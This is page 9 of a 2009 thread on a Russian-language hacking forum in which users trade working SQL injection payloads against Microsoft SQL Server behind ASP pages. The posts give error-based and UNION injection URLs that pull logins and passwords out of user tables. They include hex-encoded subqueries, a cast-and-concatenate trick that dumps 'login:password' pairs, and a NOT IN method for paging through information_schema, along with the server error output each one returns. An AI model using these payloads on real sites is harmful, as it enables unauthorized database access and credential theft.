ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу Провидение Иньекций в MSSQL сервер от Microsoft.
   
Ответ
Страница 9 из 11 « Первая < 5 6 7 8 9 10 11 >
 
Опции темы Поиск в этой теме Опции просмотра

  #81  
Старый 16.05.2009, 10:16
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Кавычки.
 
Ответить с цитированием

  #82  
Старый 16.05.2009, 13:00
hookman
Познающий
Регистрация: 16.02.2009
Сообщений: 45
Провел на форуме:
233429

Репутация: 66
Отправить сообщение для hookman с помощью ICQ
По умолчанию
Цитата:
Сообщение от mailbrush  
Кавычки.
запрос:
Код:
http://site.com/resguides/Resguide.asp?ID=1+or+1=(select+top+1+Password+from+'RGAuthor (child table)')
Ответ:
Код:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near 'RGAuthor (child table)'.

/resguides/Resguide.asp, line 13
 
Ответить с цитированием

  #83  
Старый 16.05.2009, 13:34
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Hex.
 
Ответить с цитированием

  #84  
Старый 16.05.2009, 13:49
hookman
Познающий
Регистрация: 16.02.2009
Сообщений: 45
Провел на форуме:
233429

Репутация: 66
Отправить сообщение для hookman с помощью ICQ
По умолчанию
Цитата:
Сообщение от mailbrush  
Hex.
ни хекс ни чар не подходят %)
Incorrect syntax near '0x5247417574686f7220286368696c64207461626c6529'.. ..
 
Ответить с цитированием

  #85  
Старый 16.05.2009, 13:53
hookman
Познающий
Регистрация: 16.02.2009
Сообщений: 45
Провел на форуме:
233429

Репутация: 66
Отправить сообщение для hookman с помощью ICQ
По умолчанию
А если кодировать в хекс не только название таблицы а весь подзапрос:
Код:
http://site.com/resguides/Resguide.asp?ID=1+or+1=0x2873656C6563742B746F702B312B50617373776F72642B66726F6D2B5247417574686F7220286368696C64207461626C652929
Ответ:
Код:
ADODB.Field error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

/resguides/Resguide.asp, line 16
Эт чё выходит что табла пустая?
 
Ответить с цитированием

  #86  
Старый 17.05.2009, 18:34
Raul Duke
Новичок
Регистрация: 21.01.2009
Сообщений: 6
Провел на форуме:
62064

Репутация: 0
По умолчанию
Привет Всем.
Столкнулся с такой проблемой:
При запросе
Цитата:
_http;//site.ru/index.asp?id=23+or+1=(SELECT+TOP+1+login+from+user s)--
Выдает
Цитата:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'admin' to a column of data type int.
/catalog_functions.asp, line 449
т.е. тут все норм

далее
Цитата:
http;//site.ru/index.asp?id=23+or+1=(SELECT+TOP+1+password+from+u sers)--
ответ
Цитата:
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'current_cat_id'
/catalog_functions, line 298
почему это происходит и как это обойти?
 
Ответить с цитированием

  #87  
Старый 23.05.2009, 22:12
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031

Репутация: 184
По умолчанию
Raul Duke
Попробуй concat()
 
Ответить с цитированием

  #88  
Старый 25.05.2009, 10:12
Raul Duke
Новичок
Регистрация: 21.01.2009
Сообщений: 6
Провел на форуме:
62064

Репутация: 0
По умолчанию
Вот, наслучай если у кого то такая же хрень будет
Цитата:
_http://site.ru/index.asp?id=23+or+1=(SELECT+TOP+1+cast(login+as+n varchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+ from+users)--
PS Сенкс, Pin4eG
 
Ответить с цитированием

  #89  
Старый 27.07.2009, 01:11
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Как листать записи в mssql?

делаю при помощи top - выдает одинаковые результаты.

вот к примеру.

site/script?id=-7+union+select+top+1+1,2,3,table_schema%2bchar(0x3 a)%2btable_name+4,5+from+information_schema.column s--

при подстановке после top разных значений, не меняется вывод.
 
Ответить с цитированием

  #90  
Старый 27.07.2009, 01:23
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию
TOP обозначает количество первых записей в результирующей таблице.
юзай NOT IN. Будет что-то вроде
Код:
site/script?id=-7 union select top 1 ... from information_schema.columns WHERE table_name NOT IN (SELECT TOP n table_name FROM information_schema)--
где n - номер записи
Последний раз редактировалось bons; 27.07.2009 в 01:29..
 
Ответить с цитированием
Ответ
Страница 9 из 11 « Первая < 5 6 7 8 9 10 11 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Os - моя крепость Elekt Избранное 32 06.08.2009 15:10
Мнения: "Безопасность от Microsoft: шаг к обновленному миру?" dinar_007 Мировые новости 5 25.12.2006 19:20
Дыра в Word позволяет захватить контроль над ПК »Atom1c« Мировые новости 17 12.12.2006 13:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ